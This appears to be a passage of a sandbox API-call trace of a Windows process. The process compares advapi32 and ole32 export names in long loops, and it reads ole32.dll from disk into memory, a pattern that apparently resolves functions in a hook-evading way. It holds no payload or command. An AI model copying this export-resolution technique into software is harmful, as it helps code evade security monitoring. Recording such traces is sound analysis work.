[0090.087] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0090.087] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0090.087] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedAce") returned 1 [0090.087] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedAceEx") returned 1 [0090.087] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedObjectAce") returned 1 [0090.087] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessDeniedAce") returned 1 [0090.087] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessDeniedAceEx") returned 0 [0090.087] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAFinal") returned 1 [0090.087] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAInit") returned 1 [0090.087] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAUpdate") returned 1 [0090.087] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AbortSystemShutdownA") returned 1 [0090.087] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AbortSystemShutdownW") returned 1 [0090.087] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheck") returned 1 [0090.087] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0090.087] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0090.088] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByType") returned 1 [0090.088] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0090.088] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0090.088] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultList") returned 1 [0090.088] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0090.088] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0090.088] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0090.088] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0090.088] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedAce") returned 1 [0090.088] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedAceEx") returned 1 [0090.088] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedObjectAce") returned 1 [0090.088] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedAce") returned 1 [0090.088] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedAceEx") returned 1 [0090.088] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedObjectAce") returned 0 [0090.088] lstrcmpA (lpString1="AddAce", lpString2="A_SHAFinal") returned 1 [0090.088] lstrcmpA (lpString1="AddAce", lpString2="A_SHAInit") returned 1 [0090.509] GetProcessHeap () returned 0x5b0000 [0090.509] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2d22010 | out: hHeap=0x5b0000) returned 1 [0090.638] GetProcessHeap () returned 0x5b0000 [0090.638] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5c9080 [0090.639] LoadLibraryA (lpLibFileName="Ole32.dll") returned 0x7ffc5e3e0000 [0090.639] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0090.668] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0090.668] GetModuleFileNameA (in: hModule=0x7ffc5e3e0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")) returned 0x1d [0090.668] CreateFileA (lpFileName="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0090.669] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0090.669] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0090.669] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1322240) returned 1 [0090.669] GetProcessHeap () returned 0x5b0000 [0090.669] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x142d00) returned 0x40e8040 [0090.672] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0090.672] ReadFile (in: hFile=0x140, lpBuffer=0x40e8040, nNumberOfBytesToRead=0x142d00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x40e8040*, lpNumberOfBytesRead=0x14f5a4*=0x142d00, lpOverlapped=0x0) returned 1 [0090.684] CloseHandle (hObject=0x140) returned 1 [0090.685] lstrcmpA (lpString1="BindMoniker", lpString2="BindMoniker") returned 0 [0090.685] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="BindMoniker") returned 1 [0090.685] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0090.685] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0090.685] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFreeExt") returned 0 [0090.686] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="BindMoniker") returned 1 [0090.686] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0090.686] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0090.686] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0090.686] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0090.686] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0090.686] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 0 [0090.686] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="BindMoniker") returned 1 [0090.686] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0090.686] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0090.686] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0090.686] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0090.686] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0090.686] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0090.686] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSize") returned 1 [0090.686] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSize64") returned 1 [0090.686] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSizeExt") returned 0 [0090.686] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="BindMoniker") returned 1 [0090.686] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0090.686] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0090.687] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0090.687] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0090.687] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0090.687] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0090.687] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSize") returned 1 [0090.687] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSize64") returned 1 [0090.687] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0090.687] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0090.687] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0090.687] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 0 [0090.687] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="BindMoniker") returned 1 [0090.687] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFree") returned 1 [0090.687] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFree64") returned 1 [0090.687] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0090.687] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0090.687] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0090.687] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0090.687] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSize") returned 1 [0090.687] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSize64") returned 1 [0090.687] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0090.687] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0090.687] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0090.687] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0090.687] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromOle1Class") returned 1 [0090.687] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromProgID") returned 1 [0090.687] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromProgIDEx") returned 0 [0090.688] lstrcmpA (lpString1="CheckInitDde", lpString2="BindMoniker") returned 1 [0090.688] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFree") returned -1 [0090.688] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFree64") returned -1 [0090.688] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0090.688] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0090.688] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0090.688] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0090.688] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSize") returned -1 [0090.688] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSize64") returned -1 [0090.688] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0090.688] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0090.688] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0090.688] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0090.688] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromOle1Class") returned -1 [0090.688] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromProgID") returned -1 [0090.688] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromProgIDEx") returned -1 [0090.688] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromString") returned -1 [0090.688] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0090.688] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0090.688] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0090.688] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0090.688] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0090.688] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0090.688] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0090.688] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0090.688] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0090.688] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_Connect") returned -1 [0090.688] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0090.688] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0090.689] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0090.689] lstrcmpA (lpString1="CheckInitDde", lpString2="CheckInitDde") returned 0 [0090.689] lstrcmpA (lpString1="CleanROTForApartment", lpString2="BindMoniker") returned 1 [0090.689] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFree") returned -1 [0090.689] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFree64") returned -1 [0090.689] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0090.689] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0090.689] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0090.689] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0090.689] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSize") returned -1 [0090.689] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSize64") returned -1 [0090.689] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0090.689] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0090.689] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0090.689] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0090.689] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromOle1Class") returned -1 [0090.689] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromProgID") returned -1 [0090.689] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromProgIDEx") returned -1 [0090.689] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromString") returned -1 [0090.689] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0090.689] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0090.689] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0090.689] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0090.689] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0090.689] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0090.689] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0090.689] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0090.689] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0090.689] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_Connect") returned -1 [0090.689] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0090.690] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0090.690] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0090.690] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CheckInitDde") returned 1 [0090.690] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CleanROTForApartment") returned 0 [0090.690] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="BindMoniker") returned 1 [0090.690] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFree") returned -1 [0090.690] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFree64") returned -1 [0090.690] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0090.690] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0090.690] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0090.690] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0090.690] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSize") returned -1 [0090.690] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSize64") returned -1 [0090.690] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0090.690] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0090.690] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0090.690] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0090.690] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromOle1Class") returned -1 [0090.690] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromProgID") returned -1 [0090.690] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromProgIDEx") returned -1 [0090.690] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromString") returned -1 [0090.690] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0090.690] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0090.690] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0090.690] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0090.690] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0090.690] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0090.690] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0090.690] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0090.690] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0090.690] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_Connect") returned -1 [0090.690] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0090.691] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0090.691] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0090.691] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CheckInitDde") returned 1 [0090.691] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CleanROTForApartment") returned 1 [0090.691] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="ClipboardProcessUninitialize") returned 0 [0090.691] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="BindMoniker") returned 1 [0090.691] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFree") returned 1 [0090.691] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFree64") returned 1 [0090.691] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0090.691] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0090.691] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0090.691] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0090.691] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSize") returned 1 [0090.691] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSize64") returned 1 [0090.691] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0090.691] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0090.691] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0090.691] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0090.691] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromOle1Class") returned 1 [0090.691] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromProgID") returned 1 [0090.691] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromProgIDEx") returned 1 [0090.691] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromString") returned 1 [0090.691] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0090.692] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0090.692] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0090.692] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0090.692] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0090.692] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0090.692] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0090.692] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0090.692] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0090.692] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_Connect") returned -1 [0090.692] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0090.692] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0090.692] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0090.692] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CheckInitDde") returned 1 [0090.692] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CleanROTForApartment") returned 1 [0090.692] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="ClipboardProcessUninitialize") returned 1 [0090.692] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CoAddRefServerProcess") returned 1 [0090.692] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CoAicGetTokenForCOM") returned 0 [0090.692] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="BindMoniker") returned 1 [0090.692] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFree") returned 1 [0090.692] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFree64") returned 1 [0090.692] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0090.692] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0090.692] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0090.692] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0090.692] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSize") returned 1 [0090.692] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSize64") returned 1 [0090.692] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0090.692] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0090.692] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0090.692] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0090.692] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromOle1Class") returned 1 [0090.693] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromProgID") returned 1 [0090.693] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromProgIDEx") returned 1 [0090.693] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromString") returned 1 [0090.693] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0090.693] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0090.693] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0090.693] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0090.693] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0090.693] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0090.693] lstrcmpA 